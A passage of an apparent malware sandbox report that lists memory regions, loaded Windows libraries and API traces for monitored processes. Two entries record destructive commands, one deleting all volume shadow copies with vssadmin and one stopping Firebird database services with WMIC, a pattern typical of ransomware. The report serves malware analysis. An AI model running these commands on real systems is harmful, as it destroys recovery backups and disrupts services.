= "pagefile_0x0000006029690000" filename = "" Region: id = 710 start_va = 0x60296a0000 end_va = 0x60296a6fff entry_point = 0x0 region_type = private name = "private_0x00000060296a0000" filename = "" Region: id = 711 start_va = 0x6029710000 end_va = 0x602974ffff entry_point = 0x0 region_type = private name = "private_0x0000006029710000" filename = "" Region: id = 712 start_va = 0x6029750000 end_va = 0x6029750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006029750000" filename = "" Region: id = 713 start_va = 0x6029760000 end_va = 0x6029766fff entry_point = 0x0 region_type = private name = "private_0x0000006029760000" filename = "" Region: id = 714 start_va = 0x6029770000 end_va = 0x6029770fff entry_point = 0x0 region_type = private name = "private_0x0000006029770000" filename = "" Region: id = 715 start_va = 0x6029780000 end_va = 0x6029780fff entry_point = 0x0 region_type = private name = "private_0x0000006029780000" filename = "" Region: id = 716 start_va = 0x6029890000 end_va = 0x602994dfff entry_point = 0x6029890000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 717 start_va = 0x6029a60000 end_va = 0x6029a6ffff entry_point = 0x0 region_type = private name = "private_0x0000006029a60000" filename = "" Region: id = 718 start_va = 0x6029a70000 end_va = 0x6029bf7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006029a70000" filename = "" Region: id = 719 start_va = 0x6029c00000 end_va = 0x6029d80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006029c00000" filename = "" Region: id = 720 start_va = 0x6029d90000 end_va = 0x602b18ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006029d90000" filename = "" Region: id = 721 start_va = 0x7ff6c41f0000 end_va = 0x7ff6c42effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41f0000" filename = "" Region: id = 722 start_va = 0x7ff6c431c000 end_va = 0x7ff6c431dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c431c000" filename = "" Region: id = 723 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 724 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 725 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 726 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 727 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 728 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 729 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 730 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 731 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 732 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 733 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 734 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 34 os_tid = 0xb4c Thread: id = 35 os_tid = 0x670 Thread: id = 36 os_tid = 0x774 Process: id = "16" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x78ad3000" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0x764" cmd_line = "vssadmin.exe Delete Shadows \\/All \\/Quiet" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 748 start_va = 0x270000 end_va = 0x28dfff entry_point = 0x270000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe") Region: id = 749 start_va = 0xac0000 end_va = 0x4abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 750 start_va = 0x4ac0000 end_va = 0x4adffff entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 751 start_va = 0x4ae0000 end_va = 0x4ae1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 752 start_va = 0x4af0000 end_va = 0x4b03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004af0000" filename = "" Region: id = 753 start_va = 0x4b10000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 754 start_va = 0x4b50000 end_va = 0x4b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 755 start_va = 0x4b90000 end_va = 0x4b93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 756 start_va = 0x4ba0000 end_va = 0x4ba0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ba0000" filename = "" Region: id = 757 start_va = 0x4bb0000 end_va = 0x4bb1fff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 758 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 759 start_va = 0x7fa80000 end_va = 0x7faa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fa80000" filename = "" Region: id = 760 start_va = 0x7faa7000 end_va = 0x7faa7fff entry_point = 0x0 region_type = private name = "private_0x000000007faa7000" filename = "" Region: id = 761 start_va = 0x7faa8000 end_va = 0x7faa8fff entry_point = 0x0 region_type = private name = "private_0x000000007faa8000" filename = "" Region: id = 762 start_va = 0x7faad000 end_va = 0x7faaffff entry_point = 0x0 region_type = private name = "private_0x000000007faad000" filename = "" Region: id = 763 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 764 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 765 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 766 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 767 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 768 start_va = 0x4be0000 end_va = 0x4beffff entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 769 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 770 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 771 start_va = 0x4d80000 end_va = 0x4e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d80000" filename = "" Region: id = 772 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 773 start_va = 0x4ac0000 end_va = 0x4acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ac0000" filename = "" Region: id = 774 start_va = 0x4ad0000 end_va = 0x4ad3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 775 start_va = 0x4ae0000 end_va = 0x4aecfff entry_point = 0x4ae0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui") Region: id = 776 start_va = 0x4bc0000 end_va = 0x4bc0fff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 777 start_va = 0x4bd0000 end_va = 0x4bd0fff entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 778 start_va = 0x4bf0000 end_va = 0x4cadfff entry_point = 0x4bf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 779 start_va = 0x4cb0000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004cb0000" filename = "" Region: id = 780 start_va = 0x4cf0000 end_va = 0x4d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 781 start_va = 0x4d30000 end_va = 0x4d6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 782 start_va = 0x4e80000 end_va = 0x4ebffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 783 start_va = 0x4ff0000 end_va = 0x4ffffff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 784 start_va = 0x5000000 end_va = 0x5187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005000000" filename = "" Region: id = 785 start_va = 0x5190000 end_va = 0x5310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005190000" filename = "" Region: id = 786 start_va = 0x5320000 end_va = 0x671ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005320000" filename = "" Region: id = 787 start_va = 0x74910000 end_va = 0x74a2afff entry_point = 0x74910000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll") Region: id = 788 start_va = 0x74a30000 end_va = 0x74a40fff entry_point = 0x74a30000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll") Region: id = 789 start_va = 0x74a50000 end_va = 0x74a67fff entry_point = 0x74a50000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 790 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 791 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 792 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 793 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 794 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 795 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 796 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 797 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 798 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 799 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 800 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 801 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 802 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 803 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 804 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 805 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 806 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 807 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 808 start_va = 0x7f980000 end_va = 0x7fa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f980000" filename = "" Region: id = 809 start_va = 0x7faa4000 end_va = 0x7faa6fff entry_point = 0x0 region_type = private name = "private_0x000000007faa4000" filename = "" Region: id = 810 start_va = 0x7faaa000 end_va = 0x7faacfff entry_point = 0x0 region_type = private name = "private_0x000000007faaa000" filename = "" Region: id = 811 start_va = 0x4d70000 end_va = 0x4d73fff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 812 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Thread: id = 38 os_tid = 0x544 Thread: id = 39 os_tid = 0x53c Thread: id = 40 os_tid = 0x350 Process: id = "17" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x79cd8000" os_pid = "0x2d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 813 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 814 start_va = 0xda0000 end_va = 0x4d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 815 start_va = 0x4da0000 end_va = 0x4dbffff entry_point = 0x0 region_type = private name = "private_0x0000000004da0000" filename = "" Region: id = 816 start_va = 0x4dc0000 end_va = 0x4dc1fff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 817 start_va = 0x4dd0000 end_va = 0x4de3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dd0000" filename = "" Region: id = 818 start_va = 0x4df0000 end_va = 0x4e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 819 start_va = 0x4e30000 end_va = 0x4f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e30000" filename = "" Region: id = 820 start_va = 0x4f30000 end_va = 0x4f33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f30000" filename = "" Region: id = 821 start_va = 0x4f40000 end_va = 0x4f40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f40000" filename = "" Region: id = 822 start_va = 0x4f50000 end_va = 0x4f51fff entry_point = 0x0 region_type = private name = "private_0x0000000004f50000" filename = "" Region: id = 823 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 824 start_va = 0x7ea30000 end_va = 0x7ea52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea30000" filename = "" Region: id = 825 start_va = 0x7ea59000 end_va = 0x7ea5bfff entry_point = 0x0 region_type = private name = "private_0x000000007ea59000" filename = "" Region: id = 826 start_va = 0x7ea5c000 end_va = 0x7ea5cfff entry_point = 0x0 region_type = private name = "private_0x000000007ea5c000" filename = "" Region: id = 827 start_va = 0x7ea5f000 end_va = 0x7ea5ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea5f000" filename = "" Region: id = 828 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 829 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 830 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 831 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 832 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 833 start_va = 0x5120000 end_va = 0x512ffff entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 834 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 835 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 836 start_va = 0x52d0000 end_va = 0x53cffff entry_point = 0x0 region_type = private name = "private_0x00000000052d0000" filename = "" Region: id = 837 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 878 start_va = 0x4da0000 end_va = 0x4daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 879 start_va = 0x4f60000 end_va = 0x501dfff entry_point = 0x4f60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 880 start_va = 0x5020000 end_va = 0x505ffff entry_point = 0x0 region_type = private name = "private_0x0000000005020000" filename = "" Region: id = 881 start_va = 0x50f0000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 882 start_va = 0x5130000 end_va = 0x522ffff entry_point = 0x0 region_type = private name = "private_0x0000000005130000" filename = "" Region: id = 883 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 884 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 885 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 886 start_va = 0x7e930000 end_va = 0x7ea2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e930000" filename = "" Region: id = 887 start_va = 0x7ea56000 end_va = 0x7ea58fff entry_point = 0x0 region_type = private name = "private_0x000000007ea56000" filename = "" Region: id = 888 start_va = 0x4db0000 end_va = 0x4db3fff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 889 start_va = 0x4dc0000 end_va = 0x4dc3fff entry_point = 0x0 region_type = private name = "private_0x0000000004dc0000" filename = "" Region: id = 890 start_va = 0x53d0000 end_va = 0x5706fff entry_point = 0x53d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 41 os_tid = 0x778 [0096.077] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0096.077] __set_app_type (_Type=0x1) [0096.077] __p__fmode () returned 0x77ac4d6c [0096.077] __p__commode () returned 0x77ac5b1c [0096.077] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0096.077] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0096.078] GetCurrentThreadId () returned 0x778 [0096.078] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x778) returned 0x84 [0096.078] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0096.078] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0096.078] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.080] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.080] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4f2faf0 | out: phkResult=0x4f2faf0*=0x0) returned 0x2 [0096.080] VirtualQuery (in: lpAddress=0x4f2faf7, lpBuffer=0x4f2faa8, dwLength=0x1c | out: lpBuffer=0x4f2faa8*(BaseAddress=0x4f2f000, AllocationBase=0x4e30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.080] VirtualQuery (in: lpAddress=0x4e30000, lpBuffer=0x4f2faa8, dwLength=0x1c | out: lpBuffer=0x4f2faa8*(BaseAddress=0x4e30000, AllocationBase=0x4e30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0096.080] VirtualQuery (in: lpAddress=0x4e31000, lpBuffer=0x4f2faa8, dwLength=0x1c | out: lpBuffer=0x4f2faa8*(BaseAddress=0x4e31000, AllocationBase=0x4e30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0096.080] VirtualQuery (in: lpAddress=0x4e33000, lpBuffer=0x4f2faa8, dwLength=0x1c | out: lpBuffer=0x4f2faa8*(BaseAddress=0x4e33000, AllocationBase=0x4e30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.080] VirtualQuery (in: lpAddress=0x4f30000, lpBuffer=0x4f2faa8, dwLength=0x1c | out: lpBuffer=0x4f2faa8*(BaseAddress=0x4f30000, AllocationBase=0x4f30000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0096.080] GetConsoleOutputCP () returned 0x1b5 [0096.081] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0096.081] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0096.081] _get_osfhandle (_FileHandle=1) returned 0x3c [0096.081] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0096.081] _get_osfhandle (_FileHandle=1) returned 0x3c [0096.081] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0096.081] _get_osfhandle (_FileHandle=1) returned 0x3c [0096.081] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0096.081] _get_osfhandle (_FileHandle=0) returned 0x38 [0096.081] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0096.082] _get_osfhandle (_FileHandle=0) returned 0x38 